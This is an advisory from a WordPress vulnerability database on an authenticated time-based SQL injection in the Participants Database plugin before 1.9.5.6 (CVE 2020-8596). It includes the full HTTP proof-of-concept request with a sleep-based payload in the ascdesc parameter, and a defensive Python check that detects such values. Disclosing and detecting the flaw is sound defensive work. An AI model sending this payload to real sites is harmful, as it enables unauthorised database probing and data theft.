Participants Database < 1.9.5.6 - Authenticated Time Based SQL Injection



Description
Authenticated time-based SQL injection via the ascdesc, list_filter_count, and sortBy parameters.
Proof of Concept
From the original advisory (see references):

POST /wp-admin/admin.php?page=participants-database HTTP/1.1
Host: *redacted....cause*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: /wp-admin/admin.php?page=participants-database
Content-Type: application/x-www-form-urlencoded
Content-Length: 169
Connection: close
Cookie: *cookies were here*
Upgrade-Insecure-Requests: 1

action=admin_list_filter&search_field%5B0%5D=&operator%5B0%5D=LIKE&value%5B0%5D=&logic%5B0%5D=AND&list_filter_count=1&sortBy=date_updated&ascdesc=desc%2c(select*from(select(sleep(20)))a)&submit-button=Sort
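
An added example, not part of the original advisory or the plugin's code: a defender-side check that parses an `admin_list_filter` form body and flags values of the three parameters named in the description that do not match a strict shape. The allowed shapes (asc/desc, a small integer, a plain column identifier) and the function name `check_body` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumed legitimate shapes for the three parameters the advisory names.
# These patterns are assumptions, not taken from the plugin's source.
EXPECTED = {
    "ascdesc": re.compile(r"asc|desc", re.IGNORECASE),
    "list_filter_count": re.compile(r"[0-9]{1,3}"),
    "sortBy": re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}"),
}


def check_body(body: str) -> dict:
    """Return {param: [offending values]} for a form-encoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    if fields.get("action") != ["admin_list_filter"]:
        return {}  # not the list-filter request this check is about
    findings = {}
    for name, pattern in EXPECTED.items():
        values = fields.get(name, [])
        bad = [v for v in values if not pattern.fullmatch(v)]
        # A repeated parameter is flagged whole: which copy the backend
        # reads is ambiguous, so none of the values can be trusted.
        if len(values) > 1:
            bad = values
        if bad:
            findings[name] = bad
    return findings


# Body of the request shown above, split across lines for readability.
POC_BODY = ("action=admin_list_filter&search_field%5B0%5D=&operator%5B0%5D=LIKE"
            "&value%5B0%5D=&logic%5B0%5D=AND&list_filter_count=1&sortBy=date_updated"
            "&ascdesc=desc%2c(select*from(select(sleep(20)))a)&submit-button=Sort")
# Constructed benign request for comparison.
BENIGN_BODY = ("action=admin_list_filter&list_filter_count=1"
               "&sortBy=date_updated&ascdesc=asc&submit-button=Sort")

if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, check_body(body))
```

A check like this suits request-log review or a filtering proxy; the fix itself is the plugin update to 1.9.5.6.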

Affects Plugin

fixed in version 1.9.5.6

References

CVE 2020-8596
URL https://blog.impenetrable.tech/cve-2020-8596

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Teacish
Views 2868
Verified No
WPVDB ID 10068

Timeline

Publicly Published 2020-02-10 (11 days ago)
Added 2020-02-11 (9 days ago)
Last Updated 2020-02-12 (8 days ago)
